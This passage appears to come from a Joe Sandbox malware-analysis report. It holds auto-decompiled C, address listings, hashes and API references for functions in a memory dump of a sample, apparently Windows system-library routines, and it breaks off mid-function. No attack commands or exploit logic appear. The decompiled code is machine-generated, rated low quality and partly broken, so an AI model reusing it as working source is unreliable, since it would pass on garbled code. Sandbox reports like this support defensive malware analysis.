						_t74 =  *( *[fs:0x30] + 0x10);
						_v32 = _v32 & 0x00000000;
						_v152 =  *(_t74 + 0x38) >> 1;
						_v40 = 0;
						_v44 =  &_v152;
						_v36 = 0;
						_t70 =  *(_t74 + 0x38) & 0x0000ffff;
						_v24 = _v24 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v28 =  *((intOrPtr*)(_t74 + 0x3c));
						 *(_t85 + 0x90) =  *(_t74 + 0x38) & 0x0000ffff;
						E36B11280(_t68,  *((intOrPtr*)(_t85 + 0x20)), _v144, 0x36ac1268, 0,  &_v44);
						_t79 = 0;
						E36B09A00( *(_t74 + 0x38) & 0x0000ffff,  *((intOrPtr*)(_t85 + 0x18)),  *((intOrPtr*)(_t85 + 0x18)), 0);
					}
					 *((intOrPtr*)(_t85 + 0x34)) =  *((intOrPtr*)(_t68 + 0xb8));
					_v124 = 0xc000041d;
					_push(_t79);
					_v120 =  *(_t76 + 4) | 0x00000001;
					_push(_t68);
					_push( &_v124);
					_v116 = _t76;
					 *(_t85 + 0x44) = _t79;
					_t54 = E36B24010();
					goto L2;
				}
				_pop(_t77);
				_pop(_t81);
				_pop(_t69);
				__eflags = _v8 ^ _t85;
				return E36B24B50(_t46, _t69, _v8 ^ _t85, _t74, _t77, _t81);
			}

0x36b60443
0x36b6044b
0x36b60458
0x36b6045f
0x36b60466
0x36b60469
0x36b6046e
0x36b60475
0x36b60478
0x36b6047e
0x36b60480
0x36b60481
0x36b60487
0x36b60488
0x36b6048a
0x36b60493
0x36b60495
0x36b60496
0x36b60496
0x36b6049b
0x36b6049f
0x36b6049f
0x36b604aa
0x36b604ac
0x36b604ad
0x36b604b3
0x36b604b5
0x36b604b7
0x36b604cc
0x36b604b9
0x36b604ba
0x36b604bc
0x36b604c2
0x36b604c2
0x36b604d4
0x36b604de
0x36b604ef
0x36b604fb
0x36b604fd
0x36b60504
0x36b6050f
0x36b60518
0x36b60520
0x36b60524
0x36b6052b
0x36b60532
0x36b6053a
0x36b60542
0x36b6054b
0x36b60565
0x36b6056a
0x36b60575
0x36b60575
0x36b60580
0x36b6058a
0x36b60592
0x36b60593
0x36b6059b
0x36b6059c
0x36b6059d
0x36b605a1
0x36b605a5
0x00000000
0x36b605a5
0x36b605b6
0x36b605b7
0x36b605b8
0x36b605b9
0x36b605c3

APIs

RtlDebugPrintTimes.NTDLL ref: 36B604BC

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 2ff48e267c223ed95ef9708e87de264d33c03a8ac443ccc8f703ac9a1b4dbe10
Instruction ID: 34bdcdc915496c8c498577a8f15bac4931620fc9ddc74a8616728ca5827ecab7
Opcode Fuzzy Hash: 2ff48e267c223ed95ef9708e87de264d33c03a8ac443ccc8f703ac9a1b4dbe10
Instruction Fuzzy Hash: B5413971914311AFE360DF25C844B9BBBE8FB88254F108A2AFA98D7290D7749945CF92

Uniqueness

Uniqueness Score: -1.00%

Function 36AE4779 Relevance: 1.6, APIs: 1, Instructions: 111
timeCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E36AE4779(signed int __eax, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v0;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t67;
				signed int _t69;
				void* _t73;
				intOrPtr _t74;
				signed int _t76;
				signed int _t79;
				void* _t80;
				intOrPtr* _t84;
				signed int _t88;
				intOrPtr* _t93;
				intOrPtr _t96;
				signed int _t98;
				intOrPtr* _t100;
				void* _t102;

				_t88 = __edx;
				_t55 = __eax;
				_push(_t73);
				_t100 = __edx;
				if((_a4 & 0x00000001) == 0) {
					L17:
					if((_a4 & 0x00000002) != 0) {
						_push("true");
						_t93 = _t100 + 8;
						_pop(_t74);
						do {
							__eflags =  *_t93;
							if( *_t93 != 0) {
								E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t93);
							}
							_t93 = _t93 + 4;
							_t74 = _t74 - 1;
							__eflags = _t74;
						} while (_t74 != 0);
						_t55 = E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t74, _t100);
					}
					return _t55;
				} else {
					_t79 =  *0x36bd66fc; // 0x5
					_v12 = _t79;
					if(_t79 >= 1) {
						_t98 = 0x11;
						do {
							asm("bsr eax, edi");
							_t88 = _t98;
							asm("btc edx, eax");
							_v20 = _t88;
							_t55 =  *(_t100 + _t55 * 4 - 8);
							_v16 = _t55;
							if(_t55 != 0) {
								_t55 = _t55 + _t88 * 4 + 4;
								if(_t55 != 0 &&  *_t55 != 0) {
									asm("bsr eax, edi");
									_t85 = _t98;
									asm("btc ecx, eax");
									_t67 =  *((intOrPtr*)(0x36bd66c4 + _t55 * 4));
									if(_t67 == 0) {
										_t73 = 0;
									} else {
										_t73 = 4 + _t85 * 8 + _t67;
									}
									L36AE53C0(_t73);
									_t69 =  *((intOrPtr*)(_t73 + 4));
									_v12 = _t69;
									if(_t69 != 0 && _t69 != 0xffffffff) {
										_t88 = _v16;
										_t85 =  *(_t88 + 4 + _v20 * 4);
										if(_t85 != 0) {
											 *0x36bd91e0(_t85);
											_v8();
											_t72 = _v24;
											 *(_v20 + 4 + _t72 * 4) =  *(_v20 + 4 + _v24 * 4) & 0x00000000;
										}
									}
									_t55 = E36AE52F0(_t85, _t73);
									_t79 = _v16;
								}
							}
							_t98 = _t98 + 1;
							_t79 = _t79 - 1;
							_v12 = _t79;
						} while (_t79 != 0);
					}
					L36AF2330(_t55, 0x36bd66d0);
					_t60 =  *_t100;
					if( *((intOrPtr*)(_t60 + 4)) != _t100) {
						L24:
						_t80 = 3;
						asm("int 0x29");
						_push(_t80);
						_push(_t73);
						_push(_t100);
						_push(0x36bd66d0);
						_t96 = _v28;
						_t76 = _t88;
						_t102 = _t80;
						__eflags = _t96;
						if(__eflags != 0) {
							_t61 =  *((intOrPtr*)(_t96 + 0x1c));
						} else {
							_t61 = 0;
							__eflags = 0;
						}
						_push(_a12);
						_push(_a8);
						_push(_t61);
						_push(_t96);
						_t62 = E36AE496B(_t76, _t80, _t96, _t102, __eflags);
						__eflags = _t62;
						if(_t62 >= 0) {
							E36AE491F( *((intOrPtr*)(_t102 + 0x5c)), 1);
							 *(_t102 + 0x90) =  *(_t102 + 0x90) & 0x00000000;
							 *(_t102 + 0xdd) = _t76;
							__eflags = _t96;
							if(_t96 != 0) {
								 *((intOrPtr*)(_t102 + 0x10)) =  *((intOrPtr*)(_t96 + 0x18));
							}
							__eflags =  *((intOrPtr*)(_t102 + 8));
							if(__eflags != 0) {
								E36B173B3(_t76, _t102, _t96, _t102, __eflags);
							}
							_t62 = 0;
							__eflags = 0;
						}
						return _t62;
					} else {
						_t84 =  *((intOrPtr*)(_t100 + 4));
						if( *_t84 != _t100) {
							goto L24;
						} else {
							 *_t84 = _t60;
							 *((intOrPtr*)(_t60 + 4)) = _t84;
							_t55 = E36AF24D0(0x36bd66d0);
							goto L17;
						}
					}
				}
			}

0x36ae4779
0x36ae4779
0x36ae4788
0x36ae478b
0x36ae478d
0x36ae486a
0x36ae486e
0x36ae4879
0x36ae487b
0x36ae487e
0x36ae487f
0x36ae487f
0x36ae4882
0x36ae48ab
0x36ae48ab
0x36ae4884
0x36ae4887
0x36ae4887
0x36ae4887
0x36ae4897
0x36ae4897
0x36ae4876
0x36ae4793
0x36ae4793
0x36ae4799
0x36ae47a0
0x36ae47a8
0x36ae47a9
0x36ae47a9
0x36ae47ac
0x36ae47ae
0x36ae47b1
0x36ae47b5
0x36ae47b9
0x36ae47bf
0x36ae47c4
0x36ae47c7
0x36ae47ce
0x36ae47d1
0x36ae47d3
0x36ae47d6
0x36ae47df
0x36b40144
0x36ae47e5
0x36ae47ec
0x36ae47ec
0x36ae47ef
0x36ae47f4
0x36ae47f7
0x36ae47fd
0x36ae4808
0x36ae480c
0x36ae4812
0x36ae4817
0x36ae481d
0x36ae4821
0x36ae4829
0x36ae4829
0x36ae4812
0x36ae482f
0x36ae4834
0x36ae4834
0x36ae47c7
0x36ae4838
0x36ae4839
0x36ae483c
0x36ae483c
0x36ae47a9
0x36ae484c
0x36ae4851
0x36ae4856
0x36ae48b2
0x36ae48b4
0x36ae48b5
0x36ae48bc
0x36ae48bd
0x36ae48be
0x36ae48bf
0x36ae48c0
0x36ae48c3
0x36ae48c5
0x36ae48c7
0x36ae48c9
0x36ae491a
0x36ae48cb
0x36ae48cb
0x36ae48cb
0x36ae48cb
0x36ae48cd
0x36ae48d3
0x36ae48d6
0x36ae48d7
0x36ae48d8
0x36ae48dd
0x36ae48df
0x36ae48e7
0x36ae48ec
0x36ae48f3
0x36ae48f9
0x36ae48fb
0x36ae4900
0x36ae4900
0x36ae4903
0x36ae4907
0x36ae490b
0x36ae490b
0x36ae4910
0x36ae4910
0x36ae4910
0x36ae4917
0x36ae4858
0x36ae4858
0x36ae485d
0x00000000
0x36ae485f
0x36ae485f
0x36ae4862
0x36ae4865
0x00000000
0x36ae4865
0x36ae485d
0x36ae4856

APIs

RtlDebugPrintTimes.NTDLL ref: 36AE4817

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 20bbb7c448b8abafd2e558fb3bf8dbf1c3903b8dc515b8587b361a3258280225
Instruction ID: 87fdf070359834d25b726bee8d1f844df37f02b9ff6e90a5fea21b10f619b5a6
Opcode Fuzzy Hash: 20bbb7c448b8abafd2e558fb3bf8dbf1c3903b8dc515b8587b361a3258280225
Instruction Fuzzy Hash: 7541C074A103418BE315CF29D994B2ABBEAEF81394F51452DED418F2A1DB31D851CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 36ADB420 Relevance: 1.6, APIs: 1, Instructions: 100
timeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E36ADB420(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr* _t46;
				intOrPtr _t47;
				void* _t49;
				intOrPtr _t51;
				intOrPtr _t61;
				intOrPtr* _t62;
				signed int _t69;
				void* _t71;

				_t40 = __ebx;
				_t71 = (_t69 & 0xfffffff8) - 0x14;
				_push(__ebx);
				_t61 = _a8;
				_push(__edi);
				_t57 = _t61 + 0x14;
				L36AF2330(_t25, _t61 + 0x14);
				_t27 = _t61 + 0x18;
				_t62 =  *_t27;
				if(_t62 == _t27) {
					_t62 = 0;
					goto L4;
				} else {
					if( *((intOrPtr*)(_t62 + 4)) != _t27) {
						L11:
						_t49 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						if( *0x36bd5da8 == 0) {
							E36ADB566(_t49, _v0, _t57, _t62);
							return E36ADB502(_v0);
						}
						return _t27;
					} else {
						_t51 =  *_t62;
						if( *((intOrPtr*)(_t51 + 4)) != _t62) {
							goto L11;
						} else {
							 *_t27 = _t51;
							 *((intOrPtr*)(_t51 + 4)) = _t27;
							L4:
							_t28 = E36AF24D0(_t57);
							_t42 = _a8;
							if((_t40 & 0xffffff00 |  *_t27 != _t27) != 0) {
								_t28 = E36AF1C8F(_t42, _t42,  *((intOrPtr*)(_a4 + 0x48)), _t57, "true", 0);
							}
							if(_t62 != 0) {
								_t10 = _t62 - 0x10; // -16
								_t29 = _t10;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t46 =  *((intOrPtr*)(_t29 + 0x18));
								asm("lock xadd [ecx+0x4], eax");
								if((_t29 | 0xffffffff) == 0) {
									_t31 =  *0x36bd6644; // 0x0
									E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t31 + 0x300000,  *_t46);
								}
								_t47 = _a4;
								 *((intOrPtr*)(_t47 + 0x30)) =  *((intOrPtr*)(_t42 + 0x20));
								 *((intOrPtr*)(_t47 + 0x34)) = _t42;
								 *0x36bd91e0(_t47, _t42,  *((intOrPtr*)(_t71 + 0x18)), _t71 + 0x18);
								_t28 =  *((intOrPtr*)( *((intOrPtr*)(_t42 + 0x20))))();
							}
							return _t28;
						}
					}
				}
			}

0x36adb420
0x36adb428
0x36adb42b
0x36adb42d
0x36adb430
0x36adb431
0x36adb435
0x36adb43a
0x36adb43d
0x36adb441
0x36adb4d0
0x00000000
0x36adb447
0x36adb44a
0x36adb4d4
0x36adb4d6
0x36adb4d7
0x36adb4d9
0x36adb4da
0x36adb4db
0x36adb4dc
0x36adb4dd
0x36adb4de
0x36adb4df
0x36adb4ec
0x36adb4f1
0x00000000
0x36adb4f9
0x36adb4ff
0x36adb450
0x36adb450
0x36adb455
0x00000000
0x36adb457
0x36adb457
0x36adb459
0x36adb45c
0x36adb462
0x36adb469
0x36adb46c
0x36adb4c9
0x36adb4c9
0x36adb470
0x36adb472
0x36adb472
0x36adb47b
0x36adb47c
0x36adb47d
0x36adb47e
0x36adb47f
0x36adb485
0x36adb48a
0x36b3ccdd
0x36b3ccf1
0x36b3ccf1
0x36adb490
0x36adb496
0x36adb4a2
0x36adb4ac
0x36adb4b2
0x36adb4b2
0x36adb4ba
0x36adb4ba
0x36adb455
0x36adb44a

APIs

RtlDebugPrintTimes.NTDLL ref: 36ADB4AC

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 7f4a930e638962ee9d3240bc21d11b19a719788cacf80cda24bc9a7c635f104f
Instruction ID: 87c2ffdfd050a8ee0f09cef38f1def17c6524b50a59b53b18567b705cbe68b5f
Opcode Fuzzy Hash: 7f4a930e638962ee9d3240bc21d11b19a719788cacf80cda24bc9a7c635f104f
Instruction Fuzzy Hash: 7F3141F2A00204AFC311CF14C8A0A5A77F9EF44764F214269ED048F291CB32ED02CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 36AE56E0 Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E36AE56E0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v36;
				void* _v60;
				void* _t32;
				char* _t35;
				void* _t37;
				char* _t41;
				char* _t52;
				intOrPtr _t60;
				void* _t70;
				signed int _t76;
				signed int _t77;

				_t77 = _t76 & 0xfffffff8;
				_push(__ecx);
				_t73 = _a8;
				_t70 = _a8 - 0x78;
				_t32 = E36AF3C40();
				_t52 = 0x7ffe0386;
				if(_t32 != 0) {
					_t35 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t35 = 0x7ffe0386;
				}
				if( *_t35 != 0) {
					E36BB4B67( *((intOrPtr*)(_t70 + 0x5c)), _t73,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
				}
				_t37 = E36AE7072(_a4, _t70, 0);
				if(_t37 != 0) {
					if(E36AF3C40() != 0) {
						_t41 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t41 = _t52;
					}
					if( *_t41 != 0) {
						E36BB4C59( *((intOrPtr*)(_t70 + 0x5c)), _t73,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					}
					E36AE6F4C(_t77 + 0x10,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					_t60 = _a4;
					 *((intOrPtr*)(_t60 + 0x30)) =  *((intOrPtr*)(_t70 + 0x30));
					 *((intOrPtr*)(_t60 + 0x34)) =  *((intOrPtr*)(_t70 + 0x34));
					 *0x36bd91e0(_t60,  *((intOrPtr*)(_t70 + 0x34)), _t70);
					 *((intOrPtr*)( *((intOrPtr*)(_t70 + 0x30))))();
					if(E36AF3C40() != 0) {
						_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t52 != 0) {
						E36BB4CD2( *((intOrPtr*)(_t70 + 0x5c)), _a8,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					}
					_t37 = E36AE6ECF( *((intOrPtr*)(_t77 + 0xc)));
				}
				return _t37;
			}

0x36ae56e5
0x36ae56e8
0x36ae56eb
0x36ae56ef
0x36ae56f2
0x36ae56f7
0x36ae56fe
0x36b406a1
0x36ae5704
0x36ae5704
0x36ae5704
0x36ae5709
0x36b406b9
0x36b406b9
0x36ae5716
0x36ae571d
0x36ae5726
0x36b406cc
0x36ae572c
0x36ae572c
0x36ae572c
0x36ae5731
0x36b406e4
0x36b406e4
0x36ae5744
0x36ae5749
0x36ae5750
0x36ae5756
0x36ae5762
0x36ae5768
0x36ae5771
0x36b406f7
0x36b406f7
0x36ae577a
0x36b40711
0x36b40711
0x36ae5784
0x36ae5784
0x36ae578f

APIs

RtlDebugPrintTimes.NTDLL ref: 36AE5762

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 2a4457721237cac82d3b922e8dd240190c8a4f4d85d7e5a4e9e6d72676a5add7
Instruction ID: 15996d111a806427ac5dce1c686843c523a959fb2d5c6518f5e0a6144f84552e
Opcode Fuzzy Hash: 2a4457721237cac82d3b922e8dd240190c8a4f4d85d7e5a4e9e6d72676a5add7
Instruction Fuzzy Hash: FB31AF39625A25FFE7469F24DE80A59BBA5FF84244F50A055EC018BA50CB32E831DFC1

Uniqueness

Uniqueness Score: -1.00%

Function 36B8E750 Relevance: 1.6, APIs: 1, Instructions: 91
timeCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E36B8E750(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				char _v20;
				intOrPtr _v24;
				char _v25;
				intOrPtr _v28;
				intOrPtr* _v32;
				char _v33;
				char* _t30;
				intOrPtr* _t33;
				void* _t37;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t46;
				char* _t49;
				char _t51;
				char* _t53;
				intOrPtr* _t57;
				intOrPtr* _t60;

				_t30 =  &_v12;
				_v24 = __ecx;
				_t60 = __edx;
				_v8 = _t30;
				_t46 = 0;
				_v16 = __edx;
				_v25 = 0;
				_v12 = _t30;
				L36AF2330(_t30, 0x36bd6d4c);
				_t57 =  *0x36bd379c; // 0x7746379c
				if(_t57 == 0x36bd379c) {
					L10:
					E36AF24D0(0x36bd6d4c);
					while(1) {
						_t33 = _v12;
						_t49 =  &_v12;
						if(_t33 == _t49) {
							goto L16;
						}
						if( *((intOrPtr*)(_t33 + 4)) != _t49) {
							goto L15;
						} else {
							_t51 =  *_t33;
							if( *((intOrPtr*)(_t51 + 4)) != _t33) {
								goto L15;
							} else {
								_v12 = _t51;
								 *((intOrPtr*)(_t51 + 4)) =  &_v12;
								E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
								continue;
							}
						}
						goto L16;
					}
				} else {
					do {
						_t7 = _t57 + 8; // 0x774637a4
						_t37 = _t7;
						_t46 = _t57;
						 *_t37 =  *_t37 + 1;
						_v20 = _t37;
						E36AF24D0(0x36bd6d4c);
						 *0x36bd91e0(_v28, _t60);
						if( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0xc))))() != 0) {
							_v33 = 1;
						}
						L36AF2330(_t40, 0x36bd6d4c);
						_t42 = _v32;
						_t57 =  *_t57;
						 *_t42 =  *_t42 - 1;
						if( *_t42 != 0) {
							goto L8;
						} else {
							if( *((intOrPtr*)(_t57 + 4)) != _t46) {
								L15:
								_push(3);
								asm("int 0x29");
							} else {
								_t43 =  *((intOrPtr*)(_t46 + 4));
								if( *_t43 != _t46) {
									goto L15;
								} else {
									 *_t43 = _t57;
									_t53 =  &_v20;
									 *((intOrPtr*)(_t57 + 4)) = _t43;
									_t44 = _v16;
									if( *_t44 != _t53) {
										goto L15;
									} else {
										 *_t46 = _t53;
										 *((intOrPtr*)(_t46 + 4)) = _t44;
										 *_t44 = _t46;
										_v16 = _t46;
										goto L8;
									}
								}
							}
						}
						goto L16;
						L8:
						_t60 = _v24;
					} while (_t57 != 0x36bd379c);
					_t46 = _v33;
					goto L10;
				}
				L16:
				return _t46;
			}

0x36b8e75e
0x36b8e762
0x36b8e766
0x36b8e768
0x36b8e76c
0x36b8e76e
0x36b8e777
0x36b8e77b
0x36b8e77f
0x36b8e784
0x36b8e790
0x36b8e80f
0x36b8e814
0x36b8e819
0x36b8e819
0x36b8e81d
0x36b8e823
0x00000000
0x00000000
0x36b8e828
0x00000000
0x36b8e82a
0x36b8e82a
0x36b8e82f
0x00000000
0x36b8e831
0x36b8e83c
0x36b8e842
0x36b8e848
0x00000000
0x36b8e848
0x36b8e82f
0x00000000
0x36b8e828
0x36b8e792
0x36b8e792
0x36b8e792
0x36b8e792
0x36b8e795
0x36b8e797
0x36b8e79e
0x36b8e7a2
0x36b8e7b1
0x36b8e7bb
0x36b8e7bd
0x36b8e7bd
0x36b8e7c7
0x36b8e7cc
0x36b8e7d0
0x36b8e7d2
0x36b8e7d5
0x00000000
0x36b8e7d7
0x36b8e7da
0x36b8e84f
0x36b8e84f
0x36b8e852
0x36b8e7dc
0x36b8e7dc
0x36b8e7e1
0x00000000
0x36b8e7e3
0x36b8e7e3
0x36b8e7e5
0x36b8e7e9
0x36b8e7ec
0x36b8e7f2
0x00000000
0x36b8e7f4
0x36b8e7f4
0x36b8e7f6
0x36b8e7f9
0x36b8e7fb
0x00000000
0x36b8e7fb
0x36b8e7f2
0x36b8e7e1
0x36b8e7da
0x00000000
0x36b8e7ff
0x36b8e7ff
0x36b8e803
0x36b8e80b
0x00000000
0x36b8e80b
0x36b8e854
0x36b8e85c

APIs

RtlDebugPrintTimes.NTDLL ref: 36B8E7B1

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 73001fa4ac15507eb5fad9d507272e5f74cdc4b0d7f78b289494c85c9bf4bde3
Instruction ID: 9b87a67b4867dae01112bf976b7f8bc0be16673576fbf1f501f27e8be93ba4b7
Opcode Fuzzy Hash: 73001fa4ac15507eb5fad9d507272e5f74cdc4b0d7f78b289494c85c9bf4bde3
Instruction Fuzzy Hash: 24317AB59183529FC700DF19C94094ABBE1FF89258F5596AEE4889B201E331ED06CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 36AE3536 Relevance: 1.6, APIs: 1, Instructions: 84
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E36AE3536(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int* _v8;
				char _v9;
				char _v17;
				signed int* _v20;
				void* _t24;
				signed int _t26;
				signed int* _t28;
				signed int* _t38;
				signed int _t39;
				intOrPtr* _t47;
				signed int _t49;
				signed int _t54;
				void* _t62;

				_t38 = __ecx;
				_t47 = __edx;
				_v8 = __ecx;
				if(_a4 != 0 || _a8 != 0) {
					_v9 = 0;
					_t54 = 0;
					L9:
					 *0x36bd91e0(_a4, _a8);
					_t26 =  *_t47();
					_t39 = _t26;
					if(_t39 != 0) {
						 *((intOrPtr*)(_t39 + 0x34)) = 1;
						if(_v17 != 0) {
							_t49 = 0;
							L36AF2330(_t26, 0x36bd67c4);
							_t28 = _v20;
							if( *_t28 == _t54) {
								 *_t28 = _t39;
								 *((intOrPtr*)(_t39 + 0x34)) =  *((intOrPtr*)(_t39 + 0x34)) + 1;
								if(_t54 != 0) {
									 *(_t54 + 0x34) =  *(_t54 + 0x34) - 1;
									asm("sbb edi, edi");
									_t49 =  !( ~( *(_t54 + 0x34))) & _t54;
								}
							}
							E36AF24D0(0x36bd67c4);
							if(_t49 != 0) {
								E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t49);
							}
						}
						_t26 = _t39;
					}
					goto L17;
				} else {
					_v9 = 1;
					L36AF2330(_t24, 0x36bd67c4);
					_t54 =  *_t38;
					if(_t54 == 0) {
						L7:
						E36AF24D0(0x36bd67c4);
						goto L9;
					}
					_t62 =  *((intOrPtr*)(_t54 + 0x3c)) -  *0x36bd690c; // 0x0
					if(_t62 != 0 ||  *((char*)(_t54 + 0x48)) == 0 &&  *((intOrPtr*)(_t54 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L7;
					} else {
						 *(_t54 + 0x34) =  *(_t54 + 0x34) + 1;
						E36AF24D0(0x36bd67c4);
						_t26 = _t54;
						L17:
						return _t26;
					}
				}
			}

0x36ae3547
0x36ae354a
0x36ae354c
0x36ae3550
0x36ae35b2
0x36ae35b7
0x36ae35b9
0x36ae35c1
0x36ae35c7
0x36ae35c9
0x36ae35cd
0x36ae35d4
0x36ae35db
0x36ae35e2
0x36ae35e4
0x36ae35e9
0x36ae35ef
0x36ae35f1
0x36ae35f3
0x36ae35f8
0x36ae35fa
0x36ae3602
0x36ae3606
0x36ae3606
0x36ae35f8
0x36ae360d
0x36ae3614
0x36ae3622
0x36ae3622
0x36ae3614
0x36ae3627
0x36ae3627
0x00000000
0x36ae3558
0x36ae355d
0x36ae3562
0x36ae3567
0x36ae356b
0x36ae35a6
0x36ae35ab
0x00000000
0x36ae35ab
0x36ae3570
0x36ae3576
0x00000000
0x36ae3592
0x36ae3592
0x36ae359a
0x36ae359f
0x36ae3629
0x36ae362f
0x36ae362f
0x36ae3576

APIs

RtlDebugPrintTimes.NTDLL ref: 36AE35C1

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 819cda20d4c4b2334fc2492ca7bbb02ce080cb7b12cd826bc1338cac8ff8f950
Instruction ID: 8786f9071ad786c57e4232af431a848adb7c15abe625c3d582b039738b0caecf
Opcode Fuzzy Hash: 819cda20d4c4b2334fc2492ca7bbb02ce080cb7b12cd826bc1338cac8ff8f950
Instruction Fuzzy Hash: C0212235A15600AFD321AF15CE40B1ABBA1EF80B10F522459EC450F341D675EC48CF92

Uniqueness

Uniqueness Score: -1.00%

Function 36AD92AF Relevance: 1.5, APIs: 1, Instructions: 35
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E36AD92AF(void* __ecx) {
				char _v5;
				void* _t12;
				intOrPtr* _t22;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				_v5 = 0;
				_t22 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t22 != 0) {
